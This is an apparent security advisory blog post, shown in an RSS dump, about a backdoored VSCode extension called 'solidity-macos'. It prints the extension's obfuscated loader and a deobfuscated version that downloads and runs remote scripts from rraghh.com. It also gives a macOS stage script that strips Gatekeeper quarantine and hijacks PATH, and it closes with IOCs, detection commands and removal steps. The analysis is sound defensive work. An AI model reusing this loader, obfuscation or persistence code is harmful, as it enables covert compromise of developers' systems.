DEV Community: 长风 The latest articles on DEV Community by 长风 (@changfeng). https://dev.to/changfeng https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3846662%2Ff4285103-0b8c-4e10-b627-61979451e54b.png DEV Community: 长风 https://dev.to/changfeng en Critical Security Alert: Malicious VSCode Extension "solidity-macos" Contains Backdoor 长风 Fri, 27 Mar 2026 19:53:57 +0000 https://dev.to/changfeng/critical-security-alert-malicious-vscode-extension-solidity-macos-contains-backdoor-ck6 https://dev.to/changfeng/critical-security-alert-malicious-vscode-extension-solidity-macos-contains-backdoor-ck6 <h2> Executive Summary </h2> <p>A malicious Visual Studio Code extension disguised as a Solidity development tool has been discovered containing a sophisticated backdoor. The extension <strong>"solidity-macos"</strong> (version 0.1.8) published by <strong>IoliteLabs</strong> implements a supply chain attack by injecting malicious code into a legitimate dependency package.</p> <p><strong>🔴 THREAT LEVEL: CRITICAL</strong></p> <p><strong>Extension Link</strong>: <a href="https://marketplace.visualstudio.com/items?itemName=IoliteLabs.solidity-macos" rel="noopener noreferrer">https://marketplace.visualstudio.com/items?itemName=IoliteLabs.solidity-macos</a></p> <h2> Key Findings </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Attribute</th> <th>Details</th> </tr> </thead> <tbody> <tr> <td><strong>Extension Name</strong></td> <td>solidity-macos</td> </tr> <tr> <td><strong>Publisher</strong></td> <td>IoliteLabs</td> </tr> <tr> <td><strong>Version</strong></td> <td>0.1.8</td> </tr> <tr> <td><strong>Attack Type</strong></td> <td>Supply Chain Attack</td> </tr> <tr> <td><strong>Affected Platforms</strong></td> <td>Windows, macOS</td> </tr> <tr> <td><strong>C&amp;C Infrastructure</strong></td> <td> <code>rraghh.com</code>, <code>cdn.rraghh.com</code> </td> </tr> <tr> <td><strong>Discovery Date</strong></td> <td>March 28, 2026</td> </tr> <tr> <td><strong>Status</strong></td> <td>Active threat</td> </tr> </tbody> </table></div> <h2> Attack Overview </h2> <h3> Infection Vector </h3> <p>The malware is embedded in the extension's dependency tree, specifically in the <strong><code>pako</code></strong> package's entry point file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">extension</span><span class="o">/</span><span class="nx">node_modules</span><span class="o">/</span><span class="nx">pako</span><span class="o">/</span><span class="nx">index</span><span class="p">.</span><span class="nx">js</span> </code></pre> </div> <p>The legitimate <code>pako</code> library (a JavaScript compression library) has been weaponized by injecting malicious code that executes automatically when the extension loads.</p> <h3> Execution Flow </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>VSCode Startup ↓ Extension Activation (onStartupFinished) ↓ require('pako') ↓ Malicious code execution in pako/index.js ↓ Platform detection (Windows/macOS) ↓ Download and execute remote payload ↓ Establish persistence </code></pre> </div> <h2> Technical Analysis </h2> <h3> Malicious Code (Obfuscated) </h3> <p>The injected code in <code>pako/index.js</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">var</span> <span class="nx">_0xd35d</span><span class="o">=</span><span class="p">(</span><span class="mi">965581</span><span class="o">^</span><span class="mi">965578</span><span class="p">)</span><span class="o">+</span><span class="p">(</span><span class="mi">724804</span><span class="o">^</span><span class="mi">724800</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">cp</span><span class="o">=</span><span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0069</span><span class="se">\</span><span class="s2">u006C</span><span class="se">\</span><span class="s2">u0064</span><span class="se">\</span><span class="s2">u005F</span><span class="se">\</span><span class="s2">u0070</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0065</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0073</span><span class="dl">"</span><span class="p">);</span> <span class="nx">_0xd35d</span><span class="o">=</span><span class="mi">176481</span><span class="o">^</span><span class="mi">176486</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="nx">process</span><span class="p">[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0070</span><span class="se">\</span><span class="s1">u006C</span><span class="se">\</span><span class="s1">u0061</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0066</span><span class="se">\</span><span class="s1">u006F</span><span class="se">\</span><span class="s1">u0072</span><span class="se">\</span><span class="s1">u006D</span><span class="dl">'</span><span class="p">]</span><span class="o">===</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0077</span><span class="se">\</span><span class="s2">u0069</span><span class="se">\</span><span class="s2">u006E</span><span class="se">\</span><span class="s2">u0033</span><span class="se">\</span><span class="s2">u0032</span><span class="dl">"</span><span class="p">){</span> <span class="nx">cp</span><span class="p">[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0078</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0063</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0075</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u006C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u006B</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u004C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u0053</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0070</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u003A</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u006D</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u006C</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0025</span><span class="se">\</span><span class="s2">u0054</span><span class="se">\</span><span class="s2">u0045</span><span class="se">\</span><span class="s2">u004D</span><span class="se">\</span><span class="s2">u0050</span><span class="se">\</span><span class="s2">u0025</span><span class="se">\</span><span class="s2">u005C</span><span class="se">\</span><span class="s2">u0031</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0026</span><span class="se">\</span><span class="s2">u0026</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0022</span><span class="se">\</span><span class="s2">u0025</span><span class="se">\</span><span class="s2">u0054</span><span class="se">\</span><span class="s2">u0045</span><span class="se">\</span><span class="s2">u004D</span><span class="se">\</span><span class="s2">u0050</span><span class="se">\</span><span class="s2">u0025</span><span class="se">\</span><span class="s2">u005C</span><span class="se">\</span><span class="s2">u0031</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0022</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0064</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0061</span><span class="se">\</span><span class="s1">u0063</span><span class="se">\</span><span class="s1">u0068</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0064</span><span class="dl">'</span><span class="p">:</span><span class="o">!!</span><span class="p">[],</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0073</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0064</span><span class="se">\</span><span class="s1">u0069</span><span class="se">\</span><span class="s1">u006F</span><span class="dl">'</span><span class="p">:</span><span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span><span class="p">})[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0075</span><span class="se">\</span><span class="s1">u006E</span><span class="se">\</span><span class="s1">u0072</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0066</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if</span><span class="p">(</span><span class="nx">process</span><span class="p">[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0070</span><span class="se">\</span><span class="s1">u006C</span><span class="se">\</span><span class="s1">u0061</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0066</span><span class="se">\</span><span class="s1">u006F</span><span class="se">\</span><span class="s1">u0072</span><span class="se">\</span><span class="s1">u006D</span><span class="dl">'</span><span class="p">]</span><span class="o">===</span><span class="dl">"</span><span class="s2">niwrad</span><span class="dl">"</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">""</span><span class="p">).</span><span class="nf">reverse</span><span class="p">().</span><span class="nf">join</span><span class="p">(</span><span class="dl">""</span><span class="p">)){</span> <span class="nx">cp</span><span class="p">[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0078</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0063</span><span class="dl">'</span><span class="p">](</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0075</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u006C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u002D</span><span class="se">\</span><span class="s2">u0066</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0053</span><span class="se">\</span><span class="s2">u004C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u0070</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u003A</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u0064</span><span class="se">\</span><span class="s2">u006E</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u006D</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u0074</span><span class="se">\</span><span class="s2">u002F</span><span class="se">\</span><span class="s2">u0064</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u0063</span><span class="se">\</span><span class="s2">u002E</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0068</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u007C</span><span class="se">\</span><span class="s2">u0020</span><span class="se">\</span><span class="s2">u0062</span><span class="se">\</span><span class="s2">u0061</span><span class="se">\</span><span class="s2">u0073</span><span class="se">\</span><span class="s2">u0068</span><span class="dl">"</span><span class="p">,</span> <span class="p">{</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0064</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0074</span><span class="se">\</span><span class="s1">u0061</span><span class="se">\</span><span class="s1">u0063</span><span class="se">\</span><span class="s1">u0068</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0064</span><span class="dl">'</span><span class="p">:</span><span class="o">!!</span><span class="p">[],</span><span class="dl">"</span><span class="s2">stdio</span><span class="dl">"</span><span class="p">:</span><span class="dl">"</span><span class="se">\</span><span class="s2">u0069</span><span class="se">\</span><span class="s2">u0067</span><span class="se">\</span><span class="s2">u006E</span><span class="se">\</span><span class="s2">u006F</span><span class="se">\</span><span class="s2">u0072</span><span class="se">\</span><span class="s2">u0065</span><span class="dl">"</span><span class="p">})[</span><span class="dl">'</span><span class="se">\</span><span class="s1">u0075</span><span class="se">\</span><span class="s1">u006E</span><span class="se">\</span><span class="s1">u0072</span><span class="se">\</span><span class="s1">u0065</span><span class="se">\</span><span class="s1">u0066</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> </code></pre> </div> <h3> Deobfuscated Code </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">cp</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">"</span><span class="s2">child_process</span><span class="dl">"</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">process</span><span class="p">[</span><span class="dl">'</span><span class="s1">platform</span><span class="dl">'</span><span class="p">]</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">win32</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Windows payload</span> <span class="nx">cp</span><span class="p">[</span><span class="dl">'</span><span class="s1">exec</span><span class="dl">'</span><span class="p">](</span> <span class="dl">'</span><span class="s1">curl -k -LSs "https://rraghh.com/gt/calc.bat" -o "%TEMP%</span><span class="se">\\</span><span class="s1">1.bat" &amp;&amp; start /b "" "%TEMP%</span><span class="se">\\</span><span class="s1">1.bat"</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">detached</span><span class="dl">'</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="dl">'</span><span class="s1">stdio</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span> <span class="p">}</span> <span class="p">)[</span><span class="dl">'</span><span class="s1">unref</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">process</span><span class="p">[</span><span class="dl">'</span><span class="s1">platform</span><span class="dl">'</span><span class="p">]</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">darwin</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// macOS payload ("niwrad" reversed = "darwin")</span> <span class="nx">cp</span><span class="p">[</span><span class="dl">'</span><span class="s1">exec</span><span class="dl">'</span><span class="p">](</span> <span class="dl">'</span><span class="s1">curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="dl">'</span><span class="s1">detached</span><span class="dl">'</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="dl">'</span><span class="s1">stdio</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span> <span class="p">}</span> <span class="p">)[</span><span class="dl">'</span><span class="s1">unref</span><span class="dl">'</span><span class="p">]();</span> <span class="p">}</span> </code></pre> </div> <h3> Obfuscation Techniques </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Technique</th> <th>Purpose</th> <th>Example</th> </tr> </thead> <tbody> <tr> <td><strong>Unicode Escaping</strong></td> <td>Hide keywords</td> <td> <code>\u0063\u0068\u0069\u006C\u0064_\u0070\u0072\u006F\u0063\u0065\u0073\u0073</code> → <code>child_process</code> </td> </tr> <tr> <td><strong>XOR Operations</strong></td> <td>Obfuscate numbers</td> <td> <code>965581^965578</code> → <code>7</code> </td> </tr> <tr> <td><strong>String Reversal</strong></td> <td>Hide platform names</td> <td> <code>"niwrad".split("").reverse().join("")</code> → <code>"darwin"</code> </td> </tr> <tr> <td><strong>Boolean Obfuscation</strong></td> <td>Hide true values</td> <td> <code>!![]</code> → <code>true</code> </td> </tr> </tbody> </table></div> <h2> macOS Attack Chain </h2> <h3> Stage 1: Initial Payload Download </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-fsSL</span> https://cdn.rraghh.com/gt/doc.sh | bash </code></pre> </div> <p>The downloaded script (<code>doc.sh</code>) contains:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c">#!/bin/bash</span> <span class="nb">mkdir</span> <span class="nt">-p</span> ~/.local/bin <span class="o">&amp;&amp;</span> <span class="se">\</span> curl <span class="nt">-sL</span> https://cdn.rraghh.com/gt/doc <span class="nt">-o</span> ~/.local/bin/updater <span class="o">&amp;&amp;</span> <span class="se">\</span> <span class="nb">chmod</span> +x ~/.local/bin/updater <span class="o">&amp;&amp;</span> <span class="se">\</span> xattr <span class="nt">-d</span> com.apple.quarantine ~/.local/bin/updater 2&gt;/dev/null <span class="o">||</span> <span class="nb">true</span> <span class="o">&amp;&amp;</span> <span class="se">\</span> xattr <span class="nt">-c</span> ~/.local/bin/updater 2&gt;/dev/null <span class="o">||</span> <span class="nb">true</span> <span class="o">&amp;&amp;</span> <span class="se">\</span> <span class="nb">echo</span> <span class="s1">'export PATH="$HOME/.local/bin:$PATH"'</span> <span class="o">&gt;&gt;</span> ~/.zshrc 2&gt;/dev/null <span class="o">&amp;&amp;</span> <span class="se">\</span> <span class="nb">echo</span> <span class="s1">'export PATH="$HOME/.local/bin:$PATH"'</span> <span class="o">&gt;&gt;</span> ~/.bash_profile 2&gt;/dev/null <span class="o">&amp;&amp;</span> <span class="se">\</span> ~/.local/bin/updater </code></pre> </div> <h3> Stage 2: Persistence Mechanism </h3> <p><strong>1. Create Hidden Directory</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">mkdir</span> <span class="nt">-p</span> ~/.local/bin </code></pre> </div> <p><strong>2. Download Backdoor Binary</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-sL</span> https://cdn.rraghh.com/gt/doc <span class="nt">-o</span> ~/.local/bin/updater </code></pre> </div> <p><strong>3. Make Executable</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">chmod</span> +x ~/.local/bin/updater </code></pre> </div> <p><strong>4. Bypass macOS Gatekeeper</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>xattr <span class="nt">-d</span> com.apple.quarantine ~/.local/bin/updater xattr <span class="nt">-c</span> ~/.local/bin/updater </code></pre> </div> <p>Removes quarantine attributes to prevent security warnings.</p> <p><strong>5. PATH Hijacking</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">echo</span> <span class="s1">'export PATH="$HOME/.local/bin:$PATH"'</span> <span class="o">&gt;&gt;</span> ~/.zshrc <span class="nb">echo</span> <span class="s1">'export PATH="$HOME/.local/bin:$PATH"'</span> <span class="o">&gt;&gt;</span> ~/.bash_profile </code></pre> </div> <p>Prepends malicious directory to PATH, enabling command interception.</p> <p><strong>6. Execute Backdoor</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>~/.local/bin/updater </code></pre> </div> <h2> Windows Attack Chain </h2> <h3> Payload Execution </h3> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nb">curl</span> <span class="na">-k -LSs </span><span class="s2">"https://rraghh.com/gt/calc.bat"</span> <span class="na">-o </span><span class="s2">"</span><span class="nv">%TEMP%</span><span class="s2">\1.bat"</span> <span class="o">&amp;&amp;</span> <span class="nb">start</span> <span class="na">/b </span><span class="s2">""</span> <span class="s2">"</span><span class="nv">%TEMP%</span><span class="s2">\1.bat"</span> </code></pre> </div> <p><strong>Breakdown:</strong></p> <ul> <li>Downloads <code>calc.bat</code> to temporary directory</li> <li>Executes in background using <code>start /b</code> </li> <li>Likely contains similar persistence mechanisms</li> </ul> <h2> Stealth Techniques </h2> <h3> Process Hiding </h3> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="p">{</span> <span class="dl">'</span><span class="s1">detached</span><span class="dl">'</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="c1">// Detach from parent process</span> <span class="dl">'</span><span class="s1">stdio</span><span class="dl">'</span><span class="p">:</span> <span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span> <span class="c1">// Suppress all output</span> <span class="p">}</span> <span class="p">.</span><span class="nf">unref</span><span class="p">();</span> <span class="c1">// Allow parent to exit independently</span> </code></pre> </div> <p><strong>Effects:</strong></p> <ul> <li>Malicious process runs silently in background</li> <li>No console output visible to user</li> <li>Does not block VSCode startup</li> <li>Cannot be traced from VSCode process tree</li> </ul> <h3> Anti-Detection Features </h3> <ol> <li> <strong>Code Obfuscation</strong>: Unicode escaping + XOR operations</li> <li> <strong>String Encryption</strong>: All keywords encoded</li> <li> <strong>Delayed Execution</strong>: Triggers only on extension load</li> <li> <strong>Fileless Execution</strong>: macOS version pipes directly to bash</li> <li> <strong>Legitimate Cover</strong>: Disguised as Solidity development tool</li> </ol> <h2> Indicators of Compromise (IOCs) </h2> <h3> Network Indicators </h3> <p><strong>Domains:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>rraghh.com cdn.rraghh.com *.rraghh.com </code></pre> </div> <p><strong>URLs:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>https://rraghh.com/gt/calc.bat https://cdn.rraghh.com/gt/doc.sh https://cdn.rraghh.com/gt/doc </code></pre> </div> <h3> File System Indicators </h3> <p><strong>macOS:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>~/.local/bin/updater ~/.local/bin/apple ~/.local/bin/.system_updater </code></pre> </div> <p><strong>Windows:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight batchfile"><code><span class="nv">%TEMP%</span>\1.bat </code></pre> </div> <p><strong>Modified Files:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>~/.zshrc ~/.bash_profile </code></pre> </div> <h3> File Hashes </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>SHA256(extension/node_modules/pako/index.js): fcd398abc51fd16e8bc93ef8d88a23d7dec28081b6dfce4b933020322a610508 </code></pre> </div> <h3> Process Indicators </h3> <p><strong>Process Names:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>updater apple .system_updater </code></pre> </div> <p><strong>Command Lines:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>curl <span class="nt">-fsSL</span> https://cdn.rraghh.com/gt/doc.sh | bash bash <span class="nt">-c</span> <span class="s2">"curl -fsSL https://cdn.rraghh.com/gt/doc.sh | bash"</span> </code></pre> </div> <h2> Detection Methods </h2> <h3> 1. Extension Audit </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># List all installed extensions</span> code <span class="nt">--list-extensions</span> <span class="nt">--show-versions</span> | <span class="nb">grep</span> <span class="nt">-i</span> solidity <span class="c"># Check for malicious extension</span> <span class="nb">ls</span> <span class="nt">-la</span> ~/.vscode/extensions/ | <span class="nb">grep</span> <span class="nt">-i</span> <span class="s2">"iolite"</span> </code></pre> </div> <h3> 2. File Integrity Check </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Check if pako/index.js is compromised</span> find ~/.vscode/extensions <span class="nt">-name</span> <span class="s2">"pako"</span> <span class="nt">-type</span> d <span class="nt">-exec</span> <span class="nb">grep</span> <span class="nt">-l</span> <span class="s2">"child_process</span><span class="se">\|</span><span class="s2">rraghh"</span> <span class="o">{}</span>/index.js <span class="se">\;</span> </code></pre> </div> <h3> 3. Process Monitoring </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># macOS</span> ps aux | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"updater|</span><span class="se">\.</span><span class="s2">local/bin/apple|rraghh"</span> <span class="c"># Check network connections</span> lsof <span class="nt">-i</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"rraghh"</span> netstat <span class="nt">-an</span> | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"rraghh"</span> </code></pre> </div> <h3> 4. File System Check </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Check for malicious binaries</span> <span class="nb">ls</span> <span class="nt">-la</span> ~/.local/bin/ file ~/.local/bin/updater 2&gt;/dev/null <span class="c"># Check shell configuration</span> <span class="nb">grep</span> <span class="nt">-n</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">local/bin"</span> ~/.zshrc ~/.bash_profile </code></pre> </div> <h3> 5. Network Traffic Analysis </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Monitor DNS queries</span> <span class="nb">sudo </span>tcpdump <span class="nt">-i</span> any port 53 | <span class="nb">grep </span>rraghh <span class="c"># Monitor HTTPS connections</span> <span class="nb">sudo </span>tcpdump <span class="nt">-i</span> any host rraghh.com or host cdn.rraghh.com </code></pre> </div> <h2> Removal Instructions </h2> <h3> Immediate Actions </h3> <h4> Step 1: Terminate Malicious Processes </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># macOS/Linux</span> pkill <span class="nt">-9</span> <span class="nt">-f</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">local/bin/apple"</span> pkill <span class="nt">-9</span> <span class="nt">-f</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">local/bin/updater"</span> pkill <span class="nt">-9</span> <span class="nt">-f</span> <span class="s2">"</span><span class="se">\.</span><span class="s2">local/bin/.system_updater"</span> <span class="c"># Windows</span> taskkill /F /IM updater.exe taskkill /F /IM apple.exe </code></pre> </div> <h4> Step 2: Remove Malicious Files </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># macOS/Linux</span> <span class="nb">rm</span> <span class="nt">-f</span> ~/.local/bin/apple <span class="nb">rm</span> <span class="nt">-f</span> ~/.local/bin/updater <span class="nb">rm</span> <span class="nt">-f</span> ~/.local/bin/.system_updater <span class="c"># If entire directory is compromised</span> <span class="nb">rm</span> <span class="nt">-rf</span> ~/.local/bin/ <span class="c"># Windows</span> del %TEMP%<span class="se">\1</span>.bat del %LOCALAPPDATA%<span class="se">\u</span>pdater.exe </code></pre> </div> <h4> Step 3: Clean Shell Configuration </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Backup first</span> <span class="nb">cp</span> ~/.zshrc ~/.zshrc.backup <span class="nb">cp</span> ~/.bash_profile ~/.bash_profile.backup <span class="c"># Remove malicious PATH entries</span> <span class="nb">sed</span> <span class="nt">-i</span>.bak <span class="s1">'/\.local\/bin/d'</span> ~/.zshrc <span class="nb">sed</span> <span class="nt">-i</span>.bak <span class="s1">'/\.local\/bin/d'</span> ~/.bash_profile <span class="c"># Or manually edit</span> vim ~/.zshrc vim ~/.bash_profile </code></pre> </div> <h4> Step 4: Uninstall Extension </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Via command line</span> code <span class="nt">--uninstall-extension</span> IoliteLabs.solidity-macos <span class="c"># Manual removal</span> <span class="nb">rm</span> <span class="nt">-rf</span> ~/.vscode/extensions/iolitelabs.solidity-macos-<span class="k">*</span> <span class="c"># Remove cached VSIX</span> <span class="nb">rm</span> <span class="nt">-f</span> ~/Library/Application<span class="se">\ </span>Support/Code/CachedExtensionVSIXs/iolitelabs.solidity-macos-<span class="k">*</span> </code></pre> </div> <h4> Step 5: Check LaunchAgents (macOS) </h4> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># List launch agents</span> <span class="nb">ls</span> <span class="nt">-la</span> ~/Library/LaunchAgents/ <span 